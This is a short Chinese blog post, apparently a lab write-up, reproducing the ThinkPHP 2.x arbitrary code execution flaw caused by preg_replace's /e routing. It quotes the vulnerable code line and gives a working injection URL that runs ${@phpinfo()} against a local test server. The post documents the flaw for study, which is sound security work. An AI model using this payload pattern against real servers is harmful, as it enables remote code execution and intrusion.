现实告诉我：保持好奇心，享受孤独

ThinkPHP 2.x 任意代码执行漏洞

发表于 2022-03-01 | 分类于漏洞复现 |

ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由：

1	$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞，也存在这个漏洞。

漏洞复现

环境启动后，访问http://192.168.44.132:8080/Index/Index即可查看到默认页面。

直接访问http://192.168.44.132:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行phpinfo()：

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2022/03/01/ThinkPHP%202.x%20%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%